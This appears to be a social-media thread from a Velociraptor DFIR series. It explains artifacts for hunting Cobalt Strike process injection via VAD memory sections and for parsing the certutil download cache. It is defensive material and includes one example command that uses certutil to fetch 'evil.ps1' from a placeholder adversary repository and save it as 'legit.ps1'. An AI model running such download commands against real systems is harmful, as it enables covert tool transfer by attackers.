This artifact enables enumeration of process memory sections via the Virtual Address Descriptor (VAD). The VAD is used by the Windows memory manager to describe allocated process memory ranges.
With this artifact, we can highlight suspicious process memory sections.
----
This a useful tool to have when trying to detect C2/process injection/hollowing, such as that performed by Cobalt Strike or other platforms/tools, especially where sections are unmapped and/or have certain permissions.
----
We might first use something like Windows[.]Detection[.]YARA[.]Process in a hunt to cast a wide net.
https://docs.velociraptor.app/artifact_references/pages/windows.detection.yara.process/
----
From the results, we can see the MSBuild process is listed as a match for a Cobalt Strike YARA rule.
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility, compile inline, and bypass application control defenses.
https://attack.mitre.org/techniques/T1127/001/
----
We can go a step further and dig into memory sections by leveraging the 'Windows[.]System[.]VAD' artifact.
If we specify a process regex of 'msbuild', and choose to highlight unmapped sections with RWX permissions, again using the Cobalt Strike YARA rule, we have a match.
----
The following information is included in the results:
- Process create time
- PID
- Name
- Mapping name
- Address range
- Protection
- SectionSize
- YARA match
- Process chain 🦾
- Section dump information----
If we were confident we are looking at Cobalt Strike, we can use the 'Windows[.]Carving[.]CobaltStrike' artifact to extract its configuration.
https://docs.velociraptor.app/artifact_references/pages/windows.carving.cobaltstrike/
----
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the links below!
Cobalt Strike and MSBuild:
https://blog.talosintelligence.com/building-bypass-with-msbuild/Matt Green's #DEATHCON 2022 Velociraptor Workshop:
https://mgreen27.github.io/projects/DEATHcon2022/#CobaltStrike
#DFIR
#IncidentResponse
#Infosec
#ThreatHunting
#YARA -
🦖Day 57 of the
@velocidex
#velociraptor #ArtifactsOfAutumn seriesArtifact: Windows[.]Forensics[.]CertUtil
Link: https://docs.velociraptor.app/artifact_references/pages/windows.forensics.certutil/
CertUtil is a built-in tool used to manage certificates on Windows systems.
It can be used to for living off of the land through (base64) decoding/encoding data, calculating file hashes, and downloading files from the internet.
https://attack.mitre.org/techniques/T1105/
https://attack.mitre.org/techniques/T1140/This can be useful for an attacker trying to hide their intentions and/or faciliate tool transfer for lateral movement and persistence. Last, certutil can also be used for installing browser root certificates to allow for AiTM/MiTM attacks.
In the past, certutil has been used maliciously by the following groups:
- APT28
- APT41
- Rancor
- Turla
- and others#S0160
https://attack.mitre.org/software/S0160/Certutil maintains a cache of downloaded files. This cache can contain valuable metadata.
This artifact parses the metadata within the certutil cache to establish what was downloaded, and when it was downloaded.
In this instance (shown in the image), a file called 'evil.ps1' was downloaded. 👀
The following command was run to generate this output:
'certutil -urlcache -split -f https://raw.githubusercontent.com/ExampleAdversary/scripts/main/evil.ps1 legit.ps1'
You can use the following ART test (maybe with other options, such as 'verifyctl') if you would like to test this artifact yourself:
As mentioned previously, certutil can be also used for other operations such as decoding/encoding data.
You can also try the following ART test to experiment with this functionality:
That's it for now! Stay tuned to learn about more artifacts! 🦖
Also, check out the link below for a blog that analyzes the various artifacts left from certutil usage!
u0041.co/blog/post/3